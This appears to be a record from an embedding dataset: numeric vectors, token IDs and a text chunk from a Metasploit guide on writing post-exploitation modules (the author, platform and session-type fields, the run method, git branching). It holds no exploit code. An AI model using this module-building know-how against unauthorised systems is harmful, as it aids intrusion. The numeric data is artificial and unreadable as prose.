-0.772507905960083, 1.2376797199249268, -0.2678314447402954, -0.665132999420166, -0.3568606376647949, -0.08681898564100266, 0.11716131865978241, 0.04203455150127411, -0.20971262454986572, -0.43826577067375183, -0.5946478247642517, -0.5826328992843628, -1.0342410802841187, 0.36015641689300537, 0.36306068301200867, 0.6508609056472778, 0.38096389174461365, -0.7070038914680481, 0.09141349047422409, 0.5507816076278687, -0.1288059502840042, -0.34257251024246216, -0.27135705947875977, 0.2870554029941559, 0.3088769018650055, 0.40986353158950806, 0.2036081999540329, -0.40022775530815125, 0.015778860077261925, -0.6783840656280518, 0.24229595065116882, -0.6236454248428345, 0.4199778437614441, 1.0454611778259277, 0.2844286859035492, -0.7276340126991272, 0.07027450948953629, -0.6121767163276672, -0.2567543387413025, 0.02349070832133293, 1.1403956413269043, -0.5456487536430359, -0.237278550863266, 0.9499865770339966, -0.40548792481422424, -0.09526153653860092, 0.1885116696357727, 0.08647045493125916, -0.27064210176467896, 0.5547921657562256, 0.03809216991066933, -0.6359869241714478, 0.5845782160758972, -0.7244987487792969, 0.4430887699127197, 0.11858241260051727, 0.8044769763946533, 0.23196019232273102, -0.06493420898914337, 0.6069628596305847, 0.4315676987171173, -0.018580185249447823, -0.9718101620674133, -0.42203396558761597, 0.375501424074173, 0.2841664254665375, 0.3675166666507721, -0.22775961458683014, -0.22973637282848358, -0.34308290481567383, 0.05932514742016792, -0.5987111926078796, -1.1255769729614258, -0.22226110100746155, -0.44272157549858093, -0.010926988907158375, -0.06801163405179977, -0.165404811501503, 0.8022652864456177, 0.24050098657608032, -0.052961528301239014, 0.11384271085262299, -0.16718368232250214, 0.23943187296390533, -0.6544266939163208, -0.3477880656719208, -1.086010456085205, 0.08110665529966354, -0.6765851974487305, 0.45693060755729675, -0.07651004195213318, 0.09705991297960281, -0.10180971771478653, 0.6435052156448364, 0.864364504814148, -0.32237836718559265, -0.6979181170463562, 0.6017418503761292, -0.21515068411827087, -0.6569309830665588, -0.4651024043560028, 0.42339953780174255, -0.22698938846588135, -0.20430725812911987, 0.29188287258148193, -0.16678424179553986, -0.6128456592559814, -1.224223017692566, -0.011515161022543907, -0.30333349108695984, -0.0843740850687027, -1.1901782751083374, -0.7904248833656311, -0.33663901686668396, 0.7747498750686646, 0.5601681470870972, -1.3415549993515015, -0.2526523768901825, -0.27250075340270996, 0.13643106818199158, -0.29694387316703796, -0.014887253753840923, -0.48856496810913086, -0.9099233150482178, -0.8610175251960754, 0.8251739144325256, -0.3180314004421234, -0.26677289605140686, -0.640233039855957, -0.4817860722541809, 0.04940606653690338, 0.42795994877815247, -0.8402498364448547, -0.6400021910667419, -0.4838624894618988, -0.40039679408073425, -0.0036238166503608227, 0.49810361862182617, -0.24882392585277557, 0.3498101830482483, -0.24186460673809052, 0.1438043862581253, 0.01746446266770363, 0.008419368416070938, -0.963586688041687, -0.021396229043602943, 0.15706035494804382, -0.4552898406982422, -0.014106557704508305, -0.28681764006614685, 0.6798765063285828, 0.06589669734239578, -0.25690215826034546, -0.8904062509536743, 0.27870506048202515, -0.9507555961608887, -1.1381516456604004, 0.09151571989059448, -0.1894255131483078, -0.24076053500175476, 0.20115597546100616, 0.7759070992469788, 0.7700474858283997, -0.6176453232765198, 0.38691219687461853, 1.0336464643478394, 0.4777352511882782, 0.027546249330043793, -0.627131998538971, 0.6644690632820129, 0.6042771339416504, 0.2395119071006775, 0.4175310432910919, 0.3113822937011719, -0.11775068193674088, -0.5313381552696228, -0.08546178787946701, -0.10008371621370316, -0.5782719254493713, -0.31810203194618225, 0.914790153503418, -0.261374294757843, 0.7474308609962463, 0.0675930306315422, -0.825122594833374, 0.4545428156852722, 0.4098067283630371, -0.1429411768913269, -0.23855656385421753, 0.576580822467804, 0.8530017137527466, -0.054347921162843704, -0.06284134089946747, 0.2251851111650467, -0.5317705869674683, 0.09102214127779007, 1.0291109085083008, 0.4433891475200653, -0.2674728035926819, 0.9160364866256714, 0.2725173532962799, -0.39088279008865356, -0.285571426153183, -0.2550423741340637, 0.14956249296665192, -0.4758622348308563, -0.35324618220329285, 0.11368594318628311, -0.2705564796924591, -0.06214640662074089, -0.5852751731872559, -0.009197277016937733, -0.775989830493927, 0.3036458492279053, -0.8732203245162964, 0.10839620232582092, 0.2825911045074463, 0.4569743573665619, 0.814624547958374, -0.31257274746894836, -0.108238585293293, -0.9049801230430603, -0.3308841288089752, -0.2880731225013733, 0.0003816540993284434, 0.9376872777938843, 0.3228740394115448, 0.6245090365409851, 0.2452004849910736, 0.6274355053901672, 0.8698472380638123, -0.35405096411705017, 0.05416595935821533, 0.8589608073234558, -0.2603522837162018, -0.9439902901649475, -0.4467321038246155, -0.17622680962085724, 0.5676817893981934, 1.2585759162902832, -0.18536725640296936, -0.24213576316833496, 0.17786633968353271, 0.12795275449752808, -0.6164249181747437, -0.7300488352775574, -0.6553958654403687, -1.0457805395126343, 0.22384192049503326, 0.019865192472934723, -0.3964650332927704, -0.3971162438392639, 0.19057497382164001, -0.29283520579338074, 0.15470565855503082, -0.5366367697715759, -0.3234075605869293, -0.03529391437768936, 0.005754699464887381, -0.3199382722377777, 0.43124160170555115, -0.8754469752311707, -0.4560585618019104, -0.14430050551891327, 0.4235084354877472, -0.5339639186859131, -0.9474467039108276, -0.6078050136566162, 0.5544072389602661, 0.10529007017612457, 0.2010030895471573, -0.07494256645441055, -0.2543582618236542, -0.1780761331319809, -0.5551031827926636, 0.3198753595352173, 1.2237836122512817, -0.3755764961242676, 0.6155818104743958, -0.10168657451868057, 0.028961939737200737, 0.48567646741867065, -1.3047016859054565, 0.20776353776454926, -0.3530120849609375, -0.3313653767108917, 0.36514052748680115, 0.1509598344564438, -0.09982442110776901, -0.2675507664680481, -0.6175430417060852, -1.0210801362991333, -0.8620406985282898, -0.5882890820503235, 0.27376899123191833, -0.14583934843540192, -0.5375257730484009, 0.23927420377731323, 0.3772004246711731, 0.5493941903114319, 0.09906668215990067, -0.6639728546142578, 0.8690870404243469, 0.20262201130390167, 0.10728369653224945, 0.6830280423164368, 0.09423477947711945, -0.38499125838279724, -0.3708159029483795, 0.18309955298900604, 0.419903039932251, -0.40389689803123474, 0.11393022537231445, -0.4038161337375641, -0.33792224526405334, -0.6427567601203918, -0.22770333290100098, 0.15176476538181305, 0.31390678882598877, 0.5694060921669006, 0.16573847830295563, -0.16395671665668488, -0.03518367558717728, -0.5422623753547668, -0.15960270166397095, -1.1150976419448853, 0.3006615936756134, -0.3131745457649231, -0.20651628077030182, -0.09759978950023651, -0.11649946868419647, -0.7510262727737427, 0.0048528313636779785, -0.019395649433135986, 0.4298478662967682, 0.14683063328266144, -0.43478643894195557, -0.372889906167984, 0.807341992855072, -1.2022250890731812, -0.4398001432418823, -0.03354550898075104, 0.10189176350831985, -0.5606802701950073, -0.8567482233047485, 0.41408392786979675, 0.880599856376648, 0.2024586796760559, -0.05008171871304512, -0.17554371058940887, 0.20519228279590607, 0.6138166189193726, 0.6124849319458008, 0.1839752048254013, 0.13134323060512543, -1.2354905605316162, 0.29821348190307617, -0.3034054934978485, -0.05631227418780327, -0.30630597472190857, 0.29860737919807434, 0.5202725529670715, 0.33986690640449524, -1.267949104309082, 0.9815590977668762, -0.1400974988937378, -0.1406198889017105, 0.7711517810821533, 0.8697583079338074, 0.2758035659790039, 0.3308911621570587, 0.22397160530090332, 0.008030013181269169, -0.03221893683075905, -0.006324384361505508, 0.9576795697212219, -0.4645300805568695, 0.12072709947824478, 0.3371083736419678, -1.3980441093444824, -0.3964118957519531, 0.7962667346000671, -0.14227595925331116, -0.2697031497955322, 0.03623873367905617, -0.01060674712061882, 0.0772985965013504, 0.11676979809999466, -0.06687317788600922, 0.47815629839897156, 0.027652408927679062, 0.14503413438796997, 0.3130621314048767, 0.03656509146094322, 0.9295253753662109, -0.4771480858325958, 0.29591280221939087, -0.3814300000667572, -0.20856943726539612, 0.16399188339710236, 0.2914636731147766, 0.00339139299467206, 0.152574360370636, 1.0696555376052856, 0.4658507704734802, -0.1802503764629364, 0.9708389043807983, -0.16006158292293549, -0.2704194486141205, -0.22945347428321838, -0.12238506972789764, -0.6368163824081421, 0.13816918432712555, -0.4064127206802368, -0.3115614056587219, -0.6441619992256165, 0.2982497811317444, -0.02078559435904026, 0.05577189102768898, 0.3238769769668579, -0.09875161200761795, 0.5347801446914673, -0.5454279780387878, 1.0553110837936401, -0.5140582919120789, 0.04319155216217041, 0.27224162220954895, -0.6156472563743591, -0.17738492786884308, 0.06460661441087723, 0.13454899191856384, 0.597997784614563, 0.1567356139421463, 1.076215147972107, 0.22897367179393768, 0.474128782749176, 0.1948179006576538, 0.0482667051255703, -0.46608227491378784, 0.014092088676989079, 0.2962234914302826, -0.2844541668891907, 0.30696797370910645, -0.22445625066757202, 0.8887527585029602, 0.25458768010139465, -0.15762056410312653, 0.07459486275911331, 0.5512479543685913, -0.39568760991096497, 0.021754786372184753, 1.0193474292755127, 0.23404771089553833, -0.8199021220207214, -0.06407517939805984, 0.537724494934082, 0.03528609126806259, 0.7349849343299866, -0.09236122667789459, -0.9822542667388916, -1.0679173469543457, -0.28596752882003784, -0.7573531866073608, 0.9511420130729675, -0.2747753858566284, -0.1257297247648239, -0.09377878159284592, -0.995887041091919, -0.150471493601799, 0.19066661596298218, -0.36624062061309814, 0.015980040654540062, 0.8548490405082703, 0.5405876636505127, 0.15572911500930786, 0.0628662183880806, -0.5121650695800781, -0.026462266221642494, -0.06326277554035187, 0.9006324410438538, -0.29382291436195374, 1.087036371231079, 0.6490508317947388, -0.020008016377687454, 0.0891348123550415, -0.21156258881092072, 0.581544041633606, -0.21260395646095276, 0.034925688058137894, -0.25708577036857605, -0.12781085073947906, -1.0336037874221802, -0.3974734842777252, 0.23500733077526093, 0.3367628753185272, 0.42830365896224976, 0.26280784606933594, -1.2560306787490845, -0.3744829297065735, -0.5276763439178467, -0.13581089675426483, -0.7383648753166199, 0.37588760256767273, -0.003890573512762785, -0.0741572380065918, 0.4353286623954773, -1.069502353668213, 4.073315143585205, 0.4316366910934448, 0.3227555751800537, -0.07940242439508438, 0.1585308313369751, 0.47705143690109253, 1.2764666080474854, -0.3864450752735138, 0.6061486005783081, -0.8731012940406799, 0.6442136168479919, -0.19541236758232117, -0.2513602375984192, 1.2116944789886475, 0.4025668203830719, 0.3689943253993988, -1.073289394378662, 0.366313099861145, 0.3440757989883423, -0.8783839344978333, -1.2897135019302368, -0.20156776905059814, -0.8264204859733582, 0.7607004046440125, -0.2299203872680664, 0.3951813876628876, 0.08794082701206207, -0.05354217067360878, 0.4118560552597046, 0.4811660945415497, 0.7406288981437683, -0.48205167055130005, 0.2123435139656067, -0.43244698643684387, -0.38980257511138916, -0.7415102124214172, -0.042581070214509964, -0.6925452947616577, -0.3590894937515259, -0.4288615584373474, 0.52492356300354, 0.6788953542709351, 0.2982499599456787, -0.45717063546180725, 0.436286062002182, 0.8598043918609619, -0.6505195498466492, 0.02100297622382641, 0.11176376789808273, -0.9946396946907043, 1.1572059392929077, -0.5269851684570312, 0.9071657657623291, 0.18535824120044708, -0.7881637215614319, 0.23367488384246826, -0.14205624163150787, 0.09098217636346817, 0.23235584795475006, 0.02812182903289795, 0.4097268581390381, 0.04089692234992981, 0.1670728623867035, 0.11379071325063705, -0.5489200353622437, 0.6507304906845093, -0.3788975775241852, -0.2607816159725189, 0.16816191375255585, 0.24412661790847778, -0.44991424679756165, 0.19159427285194397, 0.0931476280093193, -0.5335932970046997, 0.6553823351860046, -0.30553966760635376, -0.5583876371383667, -0.08938790112733841, 0.2670387327671051, -0.10579557716846466, -0.5968365669250488, -0.4197392463684082, -1.2488001585006714, -0.255951851606369, 0.5612771511077881, 0.6086565256118774, -0.019584618508815765, -1.0573946237564087, -0.27455705404281616, -0.08894897252321243, 0.06474018096923828, 0.483756422996521, -0.102390356361866, 0.08396933227777481, 0.029026420786976814 ]
[ 1013, 2695, 1013, 11603, 1011, 2045, 2941, 3475, 1521, 1056, 1037, 2843, 2183, 2006, 1010, 2074, 2131, 1035, 25353, 11493, 14876, 1998, 2003, 1035, 7117, 1029, 4919, 2005, 11603, 1012, 5796, 2546, 1013, 4563, 1013, 2695, 1013, 9808, 2595, 1011, 2131, 1035, 25353, 11493, 14876, 1010, 2131, 1035, 5198, 1010, 2131, 1035, 2291, 1035, 6115, 1010, 2131, 1035, 2967, 1010, 1998, 4725, 2005, 4082, 1996, 4539, 3698, 1521, 1055, 4773, 28727, 1012, 5796, 2546, 1013, 4563, 1013, 2695, 1013, 5943, 2483, 1011, 3492, 2172, 2066, 1996, 11603, 4666, 2378, 1012, 2168, 4725, 1010, 2021, 2005, 5943, 2483, 1012, 5796, 2546, 1013, 4563, 1013, 2695, 1013, 19998, 1011, 2131, 1035, 5198, 1010, 2131, 1035, 2967, 1010, 4372, 2819, 1035, 5310, 1035, 2472, 3111, 5244, 2546, 1013, 4563, 1013, 2695, 1013, 3645, 1011, 2087, 1997, 1996, 2458, 2051, 2024, 2985, 2182, 1012, 2013, 3645, 4070, 2968, 1010, 2724, 8833, 1010, 5371, 18558, 1010, 4334, 12734, 1010, 25510, 9331, 1010, 5658, 9331, 2072, 1010, 4204, 18223, 1010, 15584, 1010, 1059, 7712, 1010, 2578, 1010, 4385, 1012, 23561, 5886, 2063, 2057, 2031, 1037, 2695, 11336, 23561, 1012, 2004, 2017, 2064, 2156, 1010, 2045, 2024, 2070, 3223, 4249, 2008, 2342, 2000, 2022, 3561, 1012, 2057, 1521, 2222, 4863, 2169, 1024, 1001, 1001, 1001, 2023, 11336, 5942, 18804, 13102, 4135, 4183, 1024, 24471, 2140, 1001, 2783, 3120, 1024, 24471, 2140, 1001, 1001, 2465, 18804, 13102, 4135, 4183, 5302, 8566, 2571, 1026, 5796, 2546, 1024, 1024, 2695, 13366, 3988, 4697, 1006, 18558, 1027, 1063, 1065, 1007, 3565, 1006, 10651, 1035, 18558, 1006, 18558, 1010, 1005, 2171, 1005, 1027, 1028, 1005, 1031, 4132, 1033, 1031, 11336, 4696, 1033, 1031, 4007, 1033, 1031, 3853, 1033, 1005, 1010, 1005, 6412, 1005, 1027, 1028, 1003, 1053, 1063, 2360, 2242, 2008, 1996, 5310, 2453, 2215, 2000, 2113, 1012, 1065, 1010, 1005, 6105, 1005, 1027, 1028, 5796, 2546, 1035, 6105, 1010, 1005, 3166, 1005, 1027, 1028, 1031, 1005, 2171, 1005, 1033, 1010, 1005, 4132, 1005, 1027, 1028, 1031, 1005, 2663, 1005, 1010, 1005, 11603, 1005, 1010, 1005, 9808, 2595, 1005, 1010, 1005, 19998, 1005, 1010, 1005, 18667, 2094, 1005, 1010, 1005, 5943, 2483, 1005, 1033, 1010, 1005, 5219, 13874, 2015, 1005, 1027, 1028, 1031, 1005, 8316, 28139, 3334, 1005, 1010, 1005, 5806, 1005, 1033, 1007, 1007, 2203, 13366, 2448, 1001, 2364, 4118, 2203, 2203, 1996, 2171, 2492, 2323, 4088, 2007, 1037, 4132, 1010, 2107, 2004, 1024, 4800, 1010, 3645, 1010, 11603, 1010, 9808, 1060, 1010, 4385, 1012, 2628, 2011, 1996, 11336, 1521, 1055, 4696, 1010, 2107, 2004, 1024, 8587, 1010, 6133, 1010, 28667, 2239, 1010, 5425, 1010, 1059, 5802, 1012, 2628, 2011, 1996, 2171, 1997, 1996, 4007, 1010, 1998, 2059, 2633, 1037, 2261, 2616, 2008, 6235, 1996, 15380, 1997, 1996, 11336, 1012, 1037, 10324, 2742, 1024, 1523, 4800, 8587, 29300, 20952, 25856, 13675, 14728, 19909, 4372, 17897, 8156, 1524, 1012, 1996, 6412, 2492, 2323, 4863, 2054, 1996, 11336, 2515, 1010, 2477, 2000, 3422, 2041, 2005, 1010, 3563, 5918, 1010, 1996, 2062, 1996, 2488, 1012, 1996, 3125, 2003, 2000, 2292, 1996, 5310, 3305, 2054, 2002, 1521, 1055, 2478, 2302, 1996, 2342, 2000, 2941, 3191, 1996, 11336 ]
metasploit
111.txt
3
’ s source and figure things out. and trust me, most of them don ’ t. the author field is where you put your name. the format should be β€œ name ". if you want to have your twitter handle there, leave it as a comment, for example : " name # handle " the platform field indicates what platforms are supported, for example : win, linux, osx, unix, bsd. the sessiontypes field should be either meterpreter, or shell. you should try to support both. and finally, the run method is like your main method. start writing your code there. basic git commandsmetasploit no longer uses svn for source code management, instead we use git, so knowing some tricks with git go a long way. we ’ re not here to lecture you about how awesome git is, we know it has a learning curve and it ’ s not surprising to find new users making mistakes. every once a while, your git β€œ rage ” will kick in, and we understand. however, it ’ s important for you to take advantage of branching. every time you make a module, or make some changes to existing code, you should not do so on the default master branch. why? because when you do a msfupdate, which is metasploit ’ s utility for updating your repository, it will do a git reset before merging the changes, and all your code go bye - bye. another mistake people tend to do is have all the changes on master before submitting a pull request. this is a bad idea, because most likely you ’ re submitting other crap you don ’ t intend to change, and / or you ’ re probably asking us to merge other unnecessary commit history when there only needs to be one commit. thanks for contributing your module to the community, but no thanks to your crazy commit history. so as a habit, when you want to make something new, or change something, begin with a new branch that ’ s up to date to master. first off, make sure you ’ re on master. if you do a git status it will tell you what branch you ’ re currently on : $ git status # on branch upstream - master nothing to commit, working directory clean ok, now do a git pull to download the latest changes from metasploit : $ git pull already up - to - date. at this point, you ’ re ready to start a new branch. in
[ 0.18565136194229126, 0.216520756483078, 0.3782386779785156, -0.18974101543426514, -0.4285888075828552, -0.5362019538879395, 0.2823525369167328, 0.06899033486843109, 0.12366374582052231, 1.0585122108459473, -0.5176891088485718, 0.30780792236328125, 0.39890316128730774, -0.8278720378875732, -0.03978319838643074, -0.39135241508483887, -0.8687024116516113, -0.40521499514579773, -1.7509077787399292, 0.610282301902771, 0.7766545414924622, -0.34889063239097595, -1.413008213043213, -0.8307245373725891, -0.4951133728027344, 0.2883165776729584, 1.1523491144180298, 0.09375275671482086, 0.6203882098197937, 0.5273610949516296, 0.44083839654922485, 0.17203696072101593, -0.4167692959308624, -0.6551771759986877, 0.1316417008638382, -0.17242173850536346, 0.6428982019424438, -0.6293650269508362, -0.297506719827652, -0.19311924278736115, 0.24886958301067352, -1.078472375869751, 0.7705627083778381, -0.9278913140296936, -1.0937788486480713, -0.22871972620487213, -0.4224267303943634, -0.19203253090381622, 0.24392348527908325, -0.7976478338241577, 0.34205228090286255, 0.4989132285118103, 0.24826279282569885, 0.4886561632156372, 0.11453939974308014, 0.28488391637802124, -0.07189328223466873, -0.008403460495173931, -0.5748533010482788, 0.5312143564224243, 0.31953808665275574, 0.16923387348651886, 0.0880497470498085, -1.2797118425369263, 0.3942568898200989, 0.5428307056427002, 0.3709964156150818, -0.08037114143371582, -0.23208504915237427, -0.15162913501262665, -0.32219886779785156, 0.8202031254768372, -0.5969173908233643, -0.2838479280471802, -1.132144570350647, 0.5190067291259766, 0.9279849529266357, 0.2826167345046997, -0.642978847026825, 0.2650738060474396, -0.13525813817977905, 0.8813352584838867, 0.4730239808559418, 0.344433069229126, -0.3597774803638458, -0.5804969072341919, 0.21215496957302094, 0.21661162376403809, -0.6234126091003418, -0.38366734981536865, 0.4673864245414734, 0.17157085239887238, -0.36647939682006836, 0.21571458876132965, 0.3986794054508209, 0.33294957876205444, -0.7625295519828796, 0.6316449046134949, 0.3018244206905365, 0.18520168960094452, 0.8997199535369873, 0.6714892387390137, 0.1696481704711914, 0.4402253031730652, -0.013188009150326252, -0.023819513618946075, 0.346709281206131, -0.6584732532501221, -0.22017689049243927, -0.5756966471672058, 0.3847865164279938, 0.012467758730053902, 0.2079942375421524, -0.7411651015281677, -0.4133022725582123, -0.10929374396800995, 0.6981499195098877, 0.3735353648662567, -0.46205368638038635, 0.6576796770095825, -0.15983064472675323, -0.47117045521736145, -0.4708164632320404, -0.6725044250488281, 0.2592979669570923, 0.723134458065033, 0.2159135788679123, 1.0720713138580322, -0.4428548514842987, 0.037544507533311844, -0.16554176807403564, -0.12303166091442108, -0.062801294028759, 0.47060519456863403, -0.10664810985326767, 0.31771916151046753, -0.04937000572681427, 0.34261325001716614, 0.47922518849372864, -1.337212324142456, 0.11652056127786636, -0.036646269261837006, 0.04999921843409538, 1.2997403144836426, 0.552487313747406, -0.5177274942398071, 0.024047337472438812, 0.037106163799762726, 0.08541041612625122, 0.5640062093734741, -0.580742597579956, -0.2016560584306717, 0.4220311641693115, -0.2142971009016037, -0.4664643406867981, 0.8312897086143494, -0.7694207429885864, 0.8094176054000854, -0.6717682480812073, -0.2862202227115631, 0.3336588442325592, 0.5230667591094971, 0.30499717593193054, 0.3762465715408325, -0.6380862593650818, 0.7473956942558289, -0.6135833859443665, -0.8585616946220398, -0.5448485612869263, -0.11422639340162277, 0.3267877697944641, -0.40351343154907227, -0.03615110367536545, -0.5274062156677246, 1.527693748474121, 0.5182613134384155, 0.3312181234359741, 0.23076750338077545, -0.4048565924167633, 0.7961945533752441, -0.3136953115463257, 0.7849175930023193, 0.8536050319671631, 0.6727767586708069, -0.20490196347236633, 0.47241273522377014, 0.1957886964082718, -0.29371172189712524, -0.1933341771364212, -0.34773313999176025, -0.18276993930339813, 0.867378830909729, -0.31814083456993103, 0.41138043999671936, 0.8479398488998413, -0.07505308091640472, -0.8256451487541199, 0.3998684287071228, -0.21360436081886292, -1.3872162103652954, -0.3025742471218109, -0.1592455357313156, 0.5113638639450073, 0.6531705856323242, -0.7092909216880798, -0.7428148984909058, 0.5711176991462708, 0.7897249460220337, -0.35563430190086365, 0.0939130112528801, 0.8147858381271362, 0.14059323072433472, -0.7804175615310669, 0.276754766702652, -0.7231078147888184, -0.3507334291934967, -0.5382249355316162, 0.5390834212303162, -0.5765580534934998, 0.051431890577077866, 0.36451295018196106, 0.6130343675613403, 0.39244455099105835, 0.33849653601646423, 0.2555001378059387, -0.6269685626029968, 0.1859847903251648, -0.10803922265768051, -0.6599812507629395, -0.24105378985404968, 0.15464602410793304, 0.1405591368675232, 0.25281810760498047, 0.9024766087532043, 0.22059617936611176, -0.7879343628883362, 0.605338454246521, 0.6615380644798279, -0.01382108312100172, 0.35096830129623413, -0.1980358064174652, 0.92231285572052, 0.21491815149784088, 0.7395274043083191, 0.6260448694229126, 0.2881104350090027, -0.018940851092338562, -0.5769950747489929, 0.6410187482833862, 0.5712153911590576, -0.7114924788475037, 0.7818474769592285, 0.3072490096092224, -0.6281844973564148, -0.18879127502441406, -0.9160457849502563, 0.2801077663898468, 1.1101268529891968, -1.1593029499053955, -0.2941516935825348, 0.03016193024814129, -0.28121843934059143, -0.5110347270965576, 0.04189971834421158, -0.3423892855644226, 0.5250589847564697, -0.9525256156921387, 0.19599510729312897, 0.006504531018435955, -1.212935447692871, -0.09007762372493744, -0.09352665394544601, -0.6568440198898315, -0.8121832013130188, -0.866478681564331, 0.3832440674304962, 0.00907021202147007, -0.43344467878341675, -0.32501494884490967, -0.6507662534713745, -0.6856040358543396, -0.06568029522895813, 0.7639679312705994, 0.712381899356842, -0.25914621353149414, -0.008038097992539406, -0.5087994933128357, -0.08779364079236984, -0.1267271190881729, 1.451296091079712, -0.21482844650745392, -0.8027739524841309, -0.23864969611167908, -0.13420338928699493, 0.28298434615135193, -0.1783764511346817, 0.3447766602039337, 0.10045561194419861, -0.202114999294281, -0.14169208705425262, -0.5224829316139221, -0.39131417870521545, 0.4381263554096222, -0.3482483923435211, -0.045779384672641754, 0.43720731139183044, -0.6962188482284546, -0.4874149560928345, 0.15186837315559387, 0.7921989560127258, -0.8474152088165283, 0.3309158682823181, -0.4967217445373535, 0.4499187767505646, -0.7671441435813904, 0.2679117023944855, 0.30124253034591675, 0.40161004662513733, -0.24040167033672333, -0.2839830219745636, 0.33674225211143494, -0.6144342422485352, 0.3055824041366577, -0.3591430187225342, 0.004442843608558178, 0.7088640928268433, 0.215162992477417, -1.0818707942962646, 0.4892996847629547, -0.5499560832977295, -0.43465450406074524, -0.29521963000297546, -0.28012946248054504, 0.8037326335906982, -0.13341538608074188, -0.3158808946609497, -0.15205906331539154, -0.2255416065454483, 0.3657616972923279, 0.004512311425060034, 0.630068302154541, -0.48225364089012146, 0.5181565880775452, 0.36199042201042175, -0.34346264600753784, 0.3622908890247345, 0.5565046072006226, -0.829836905002594, -0.2239273190498352, 0.13684090971946716, -0.21086794137954712, -0.166717529296875, 0.31238988041877747, 1.1392481327056885, 0.08386614173650742, 0.31349650025367737, -0.7277171015739441, -0.13399581611156464, 0.08301055431365967, -0.17735141515731812, 0.7028573155403137, 0.560504674911499, -0.08054947108030319, 0.02257981337606907, -0.9985742568969727, -0.5736716389656067, -0.15382912755012512, 0.32598504424095154, 0.9341633319854736, -0.5139206647872925, 1.2070395946502686, -0.3179175853729248, -0.35834985971450806, 0.2922922968864441, -0.4422842562198639, -0.7245245575904846, 0.583754301071167, 0.6611628532409668, 0.5142616033554077, 0.12322088330984116, 0.2577800452709198, -0.3413116931915283, 0.0030004973523318768, 0.5359565019607544, 1.2188270092010498, 0.2505187392234802, -0.405208945274353, -0.7419842481613159, -0.5827465653419495, -0.7602530121803284, -0.2609770894050598, -0.2056044191122055, 0.48195818066596985, -0.9519770741462708, -0.5285347700119019, -0.7495203614234924, 1.018021583557129, 1.179540753364563, 0.9564225673675537, 0.9211897253990173, 0.3647993505001068, -0.3953985571861267, -0.12052477896213531, 0.7607357501983643, -0.2033282220363617, 0.6586241722106934, -0.4509594738483429, 1.0646553039550781, 0.05053602159023285, 0.5992921590805054, 0.07098978012800217, -0.15188558399677277, -0.14300838112831116, 0.11148598045110703, 0.31426554918289185, 0.27724701166152954, -0.5028868317604065, -0.08731276541948318, 0.33507245779037476, 0.13952454924583435, -0.996605634689331, -0.3737630844116211, -0.041538771241903305, 1.0941838026046753, 0.7682222723960876, -1.1519787311553955, -0.4150635302066803, -0.5673591494560242, -0.19372311234474182, 0.2208108752965927, 0.5397319793701172, -0.20762531459331512, -0.12672166526317596, -0.3565538823604584, -1.0669865608215332, -0.07852119952440262, 0.3686189353466034, 0.3820226490497589, -0.05756211280822754, -0.47405707836151123, -0.23706375062465668, 0.1224302351474762, -0.28490933775901794, -0.35004162788391113, 0.2302897572517395, 0.04777708277106285, -0.5509305000305176, -0.1439802348613739, 0.11559642106294632, -0.6498516798019409, 0.2954617738723755, -0.4227476119995117, 0.2614467740058899, -0.5127978324890137, -0.07526674121618271, -0.17923758924007416, 0.3170030117034912, 0.03348159417510033, 0.371045857667923, -0.5165150761604309, 0.006979817058891058, -0.5404564738273621, 0.5151832103729248, -0.00010983063839375973, -0.3272553086280823, 0.5950894951820374, 0.3235630989074707, -0.3154309093952179, 0.4694209396839142, 0.17771747708320618, -0.45180702209472656, 0.2637290954589844, -0.4708895683288574, -0.30356869101524353, 0.35142022371292114, -0.7603765726089478, 0.5872595906257629, 0.05301288515329361, -0.12296749651432037, -0.049305547028779984, -0.7050254344940186, 0.6568936109542847, 0.11693441867828369, 0.17927852272987366, -0.8214907050132751, -0.4118909537792206, 0.0876835361123085, -0.1303005963563919, 0.023200444877147675, 0.251671701669693, 0.012022998183965683, -0.12422191351652145, -0.18155424296855927, 0.0770496129989624, -0.799015462398529, -0.5284448862075806, -0.9558634161949158, -0.4414146840572357, 0.22538772225379944, -0.06039392948150635, 0.33928757905960083, 0.20593605935573578, -0.40040871500968933, 0.31443190574645996, -0.8044971823692322, 0.2489003688097, -0.59868323802948, -0.13741114735603333, -0.2608932554721832, 0.29122433066368103, -0.5214672684669495, 0.3752051293849945, -0.003463649656623602, 0.10673163086175919, 0.4612295627593994, 0.5909580588340759, 0.6214110851287842, -0.039009690284729004, -0.8526559472084045, 0.9081844091415405, -0.34925371408462524, -0.4998217523097992, -0.2295091450214386, -0.12250665575265884, -0.19120952486991882, -0.16612733900547028, -0.32469913363456726, -0.44375380873680115, -1.0982102155685425, -0.5319966077804565, -0.07675298303365707, -0.4049587845802307, 0.2642878592014313, -0.44436195492744446, -0.8291285634040833, 0.2495114505290985, 0.08726704120635986, 0.5473312139511108, -1.3080403804779053, 0.4158373475074768, -0.23187649250030518, 0.030773917213082314, -0.20486746728420258, 0.44802477955818176, 0.07574135065078735, -0.10290563851594925, -0.24126295745372772, 0.653502881526947, -0.3547636866569519, 0.4469807744026184, -0.43123552203178406, 0.11140996962785721, -0.14328449964523315, 0.757117748260498, -0.28561440110206604, 0.1789560616016388, -0.25439125299453735, 0.029105935245752335, 0.0007513916934840381, 0.5039466023445129, 0.055569589138031006, 0.6200841069221497, -0.14115865528583527, 0.3267786502838135, 0.18050426244735718, 0.041992440819740295, -0.5563209652900696, 0.006669885478913784, 0.33750858902931213, -0.6334004998207092, -0.05844879150390625, 0.3097628057003021, 0.8742360472679138, 0.30363166332244873, -0.2667224109172821, -0.44169214367866516, 0.2625589072704315, -0.5840633511543274, -1.0334467887878418, 0.14332474768161774, -0.21416956186294556, -0.04755057394504547, -0.005059585440903902, -0.3004370927810669, 0.8304601311683655, -0.8481912016868591, 0.18969660997390747, 1.0271862745285034, 0.9106283783912659, 1.0315580368041992, -1.1720471382141113, 0.7550261616706848, 0.5510583519935608, -0.06794576346874237, 0.5391916036605835, -0.3213549256324768, -0.38089847564697266, 0.07093800604343414, 0.2681894302368164, -0.18102271854877472, -0.789756715297699, -0.26119211316108704, 0.4369033873081207, 0.2788315415382385, 0.8560757637023926, -0.5017291903495789, -0.6799901127815247, -0.016034390777349472, 0.6106096506118774, 0.1440868377685547, -0.3152054250240326, 0.3350633680820465, 0.0949363112449646, 0.5021352767944336, 0.21781370043754578, 0.09683538228273392, -0.01828131452202797, -0.2940121591091156, 0.879811704158783, 0.3891867995262146, -0.16440589725971222, 0.345747172832489, 0.5776655077934265, -1.5054842233657837, -0.9277853965759277, -0.8801358342170715, 0.32235774397850037, -0.15247564017772675, -0.6265519261360168, -0.41039714217185974, 0.32170936465263367, 0.10192713886499405, 0.2296454906463623, 